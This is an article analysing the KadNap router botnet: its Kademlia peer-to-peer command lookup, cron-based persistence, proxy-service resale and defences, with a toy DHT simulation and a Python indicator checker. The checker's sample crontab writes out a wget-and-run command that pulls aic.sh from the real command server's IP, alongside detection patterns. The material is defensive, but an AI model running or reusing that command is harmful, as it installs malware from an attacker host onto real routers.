
KadNap Malware

Cybersecurity researchers have identified a newly emerging malware strain known as KadNap, which primarily targets Asus routers and recruits them into a botnet designed to proxy malicious internet traffic. First observed in the wild in August 2025, the malware has already infected more than 14,000 devices worldwide. Analysis indicates that over 60% of compromised systems are located in the United States, while smaller clusters of infections have been detected in Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy, and Spain.

Although Asus routers appear to be the primary targets, investigations show that the operators behind KadNap have expanded their efforts to include a broader range of edge networking devices. This expansion suggests a deliberate attempt to maximize the size and resilience of the botnet infrastructure.

Peer-to-Peer Concealment Through Kademlia Technology

A defining feature of the KadNap operation is its reliance on a modified implementation of the Kademlia Distributed Hash Table (DHT) protocol. This protocol is integrated into a peer-to-peer architecture that conceals the location of the botnet's infrastructure by hiding command systems within distributed nodes.

Compromised devices communicate through the DHT network to discover and connect to Command-and-Control (C2) servers. By dispersing communication across a decentralized environment, the malware avoids reliance on a single infrastructure point, significantly complicating traditional detection and takedown efforts. The approach effectively blends malicious traffic into legitimate peer-to-peer network activity, making monitoring and disruption considerably more difficult for defenders.
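To make the decentralized lookup concrete, here is a toy Kademlia simulation. It is an added example written for this article, not KadNap's code: a constructed network of 16 peers with SHA-1 node IDs, the XOR distance metric and k-buckets from the Kademlia paper, and an iterative FIND_NODE that locates the peers closest to a target key without any node knowing the whole network. The "rendezvous key" derived from a time window is an assumption made for illustration (the article does not give KadNap's derivation), and the takedown helper shows why seizing a single node does not break the lookup.

```python
"""Toy Kademlia lookup illustrating peer discovery with no central server.
Added example for this article; not KadNap's implementation. The rendezvous
key derivation and the peer names are assumptions made for the demonstration."""
import hashlib

K = 3  # Kademlia's k: bucket size and number of contacts a lookup returns


def node_id(seed: bytes) -> int:
    """160-bit node ID: SHA-1 of a seed, as in the original Kademlia paper."""
    return int.from_bytes(hashlib.sha1(seed).digest(), "big")


def xor_distance(a: int, b: int) -> int:
    """Kademlia's distance metric."""
    return a ^ b


def bucket_index(distance: int) -> int:
    """k-bucket a contact belongs in: position of the highest differing bit."""
    return distance.bit_length() - 1


def k_closest(target: int, ids: dict, k: int = K) -> list:
    """Names of the k entries in ids whose IDs are XOR-closest to target."""
    return sorted(ids, key=lambda name: xor_distance(ids[name], target))[:k]


def build_routing_tables(peers: dict, k: int = K) -> dict:
    """Give every peer at most k contacts per k-bucket; nobody knows everyone."""
    tables = {}
    for name, nid in peers.items():
        buckets = {}
        for other, oid in peers.items():
            if other == name:
                continue
            bucket = buckets.setdefault(bucket_index(xor_distance(nid, oid)), [])
            if len(bucket) < k:
                bucket.append(other)
        tables[name] = [c for contacts in buckets.values() for c in contacts]
    return tables


def iterative_find_node(target: int, start: str, peers: dict, tables: dict, k: int = K):
    """Simulated FIND_NODE: ask the closest unqueried contacts, learn who they
    know, stop once the k closest known peers have all been asked.
    Returns (names of the k closest peers found, number of peers queried)."""
    known = {start}
    queried = set()
    while True:
        closest = k_closest(target, {n: peers[n] for n in known}, k)
        pending = [n for n in closest if n not in queried]
        if not pending:
            return closest, len(queried)
        for name in pending:
            queried.add(name)
            known.update(tables[name])


def rendezvous_key(epoch_seconds: int, window_seconds: int = 3600) -> int:
    """ASSUMPTION for illustration only: a key every bot can recompute from the
    current time (e.g. from an NTP query), so all bots search the same region
    of the DHT. The article does not describe KadNap's actual derivation."""
    window = epoch_seconds // window_seconds
    return node_id(b"rendezvous:" + str(window).encode())


def simulate_takedown(peers: dict, tables: dict, dead: str):
    """Remove a seized peer from the network and from every contact list."""
    survivors = {n: i for n, i in peers.items() if n != dead}
    new_tables = {n: [c for c in cs if c != dead] for n, cs in tables.items() if n != dead}
    return survivors, new_tables


# Constructed toy network of 16 peers (names and IDs are made up for this example).
PEERS = {f"peer{i:02d}": node_id(f"peer{i:02d}".encode()) for i in range(16)}
TABLES = build_routing_tables(PEERS)

if __name__ == "__main__":
    key = rendezvous_key(1_754_006_400)  # constructed timestamp: 1 Aug 2025 00:00 UTC
    found, sent = iterative_find_node(key, "peer00", PEERS, TABLES)
    print("closest to rendezvous key:", found, "after querying", sent, "peers")
    survivors, tables = simulate_takedown(PEERS, TABLES, found[0])
    print("after seizing", found[0] + ":", iterative_find_node(key, "peer01", survivors, tables)[0])
```

The point for defenders is in the last two lines: every peer reaches the same neighbourhood of the key space from its own partial view, and removing the node it found only makes the next-closest node the answer. Blocking one IP address therefore does nothing to the botnet's ability to find its command nodes.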

Infection Mechanism and Persistence Strategy

The infection chain begins with a shell script named aic.sh, which is downloaded from a command server hosted at the IP address 212.104.141.140. This script initiates the process of integrating the compromised device into the botnet's peer-to-peer ecosystem.

The script establishes persistence by installing a cron job that re-fetches the same script every hour at minute 55 (a '55 * * * *' crontab schedule), which restores the foothold within the hour if the local copy is deleted. Each download is saved as a hidden file named '.asusrouter' and executed. Once persistence is in place, the script downloads a malicious ELF binary, saves it as kad, and runs it, deploying the KadNap payload itself. Builds exist for both ARM and MIPS processors, covering the bulk of consumer router architectures.

Time-Based Peer Discovery and Network Coordination

KadNap incorporates a mechanism for synchronizing activity across its decentralized network. The malware connects to a Network Time Protocol (NTP) server to retrieve the current system time and combines it with the infected device's uptime information. These values are used to generate a hash that helps the infected device locate peers within the distributed network.

This process enables compromised systems to discover other nodes, obtain instructions, and download additional malicious files without relying on a centralized command structure. Supporting scripts such as fwr.sh and /tmp/.sose perform additional tasks, including blocking TCP port 22, the standard port used by Secure Shell (SSH), and extracting lists of C2 server address and port pairs used for further communication.
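The persistence chain (hourly cron fetch of aic.sh from 212.104.141.140, the hidden '.asusrouter' copy, the kad binary) and the helper scripts above leave artifacts that can be checked from a shell on the router. The following is an added example written for this article, not vendor or researcher tooling: it runs indicator checks over constructed samples of what 'crontab -l', a process listing and 'iptables -S' might print on a busybox router. The indicator names and the C2 address come from this write-up; the exact cron command line, the process-listing layout ("PID ARGS") and the iptables rule text are assumptions.

```python
"""Indicator checks for the KadNap persistence chain described in this article.
Added example, not vendor tooling. Indicator strings come from the write-up;
the sample inputs below are constructed and the exact command lines, process
listing format and firewall rule text are assumptions."""
import re

C2_IP = "212.104.141.140"
DROPPER_NAME = "aic.sh"
# Script and file names named in the write-up.
FILE_INDICATORS = (".asusrouter", "/tmp/.sose", "fwr.sh", "aic.sh")


def scan_crontab(crontab_text: str) -> list:
    """Flag cron entries that reference the C2 IP or dropper, or that fetch
    something every hour at minute 55. Returns [(line, [reasons]), ...]."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # minute hour dom month dow command
        if len(fields) < 6:
            continue
        minute, command = fields[0], fields[5]
        reasons = []
        if C2_IP in command:
            reasons.append("C2 IP")
        if DROPPER_NAME in command:
            reasons.append("dropper name")
        if minute == "55" and re.search(r"\b(wget|curl)\b", command):
            reasons.append("hourly fetch at :55")
        if reasons:
            findings.append((line, reasons))
    return findings


def scan_processes(ps_text: str) -> list:
    """Flag processes whose binary is named kad or whose command line names one
    of the known scripts. Assumes a listing with a header row and 'PID ARGS' rows."""
    hits = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 1)
        if len(parts) < 2:
            continue
        pid, args = parts
        argv0 = args.split()[0]
        reasons = []
        if argv0.rsplit("/", 1)[-1] == "kad":
            reasons.append("payload name 'kad'")
        if any(ind in args for ind in FILE_INDICATORS):
            reasons.append("known script name")
        if reasons:
            hits.append((pid, reasons))
    return hits


def scan_firewall(iptables_text: str) -> list:
    """Return 'iptables -S' rules that DROP or REJECT inbound TCP port 22
    (the behaviour attributed to fwr.sh / .sose; rule text is an assumption)."""
    rule = re.compile(r"-p tcp\b.*--dport 22\b.*-j (?:DROP|REJECT)")
    return [l.strip() for l in iptables_text.splitlines() if rule.search(l)]


def assess(crontab_text: str, ps_text: str, iptables_text: str) -> dict:
    """Combine the three checks. A blocked port 22 on its own is not proof of
    infection (administrators disable SSH too), so it only corroborates."""
    cron = scan_crontab(crontab_text)
    procs = scan_processes(ps_text)
    fw = scan_firewall(iptables_text)
    return {"cron": cron, "processes": procs, "firewall": fw,
            "infected": bool(cron or procs)}


# Constructed samples of an infected router's state (not captured data).
SAMPLE_CRONTAB = """# constructed crontab
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
55 * * * * wget -q http://212.104.141.140/aic.sh -O /tmp/.asusrouter && sh /tmp/.asusrouter
"""
SAMPLE_PS = """PID ARGS
1 /sbin/init
412 /usr/sbin/httpd
733 /tmp/kad
801 sh /tmp/.asusrouter
"""
SAMPLE_IPTABLES = """-P INPUT ACCEPT
-A INPUT -i br0 -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j DROP
"""

if __name__ == "__main__":
    for key, value in assess(SAMPLE_CRONTAB, SAMPLE_PS, SAMPLE_IPTABLES).items():
        print(f"{key}: {value}")
```

On a real device the three inputs would come from 'crontab -l' (or 'cru l' on Asus firmware), the busybox process listing and 'iptables -S'; because the dropper is re-fetched hourly, a clean process list taken minutes after a reboot says little unless the cron entry is also gone.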

Commercialization of the Botnet Through Proxy Services

Once routers are compromised, they are integrated into a commercial proxy network marketed under the name Doppelgänger through the website doppelganger.shop. Security researchers assess this service to be a rebranded version of Faceless, a proxy platform previously associated with the TheMoon malware.

According to promotional material published by the service, the network provides residential proxy access across more than 50 countries and advertises '100% anonymity' for users. Evidence suggests the platform was launched around May or June 2025. Not every compromised device communicates with every command server; the infrastructure segments infected devices by type and model, which points to a structured and scalable botnet management strategy.

The proxy network has already been observed being exploited by multiple threat actors. However, attribution remains difficult because routers involved in the network are sometimes simultaneously infected with additional malware families, obscuring which actor is responsible for specific malicious activities.

Defensive Measures for Router Owners

The rise of KadNap highlights the growing risk posed by poorly secured edge devices within both home and small-office environments. Network defenders and individual users can significantly reduce exposure by adopting several security practices:

  • Maintain routers and networking devices with the latest firmware and security updates.
  • Reboot devices periodically to clear malicious processes and files that live only in volatile storage such as /tmp. Note that a reboot alone is not a cleanup: if the cron entry survives, the dropper is fetched again at the next :55, so check scheduled jobs as well.
  • Replace default credentials with strong, unique passwords.
  • Disable remote (WAN-side) administration, or restrict it to trusted addresses, and protect the management interface with strong authentication.
  • Retire and replace routers that have reached end-of-life and no longer receive vendor security updates.

A Decentralized Botnet Designed for Stealth

KadNap distinguishes itself from many traditional botnets that support anonymous proxy services through its use of a decentralized peer-to-peer architecture. By leveraging the Kademlia DHT protocol, the botnet distributes control across infected devices rather than relying on easily identifiable centralized servers.

This architecture provides operators with resilient communication channels that are significantly harder to detect, block, or dismantle. The strategic goal is clear: maintain operational continuity, evade security monitoring, and complicate defensive response efforts for cybersecurity teams.
